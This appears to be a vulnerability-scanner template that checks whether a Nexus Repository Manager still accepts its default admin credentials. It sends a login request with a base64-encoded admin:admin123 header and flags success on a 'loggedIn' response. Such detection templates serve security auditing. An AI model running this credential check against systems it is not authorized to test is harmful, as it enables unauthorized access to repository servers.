id: nexus-default-password

info:
    name: Nexus Default Password
    author: Soveless(https://github.com/Soveless)
    severity: high

rules:
    r0:
        request:
            method: GET
            path: /service/local/authentication/login
            headers:
                Accept: application/json
                Authorization: Basic YWRtaW46YWRtaW4xMjM=
        expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"loggedIn")
expression: r0()

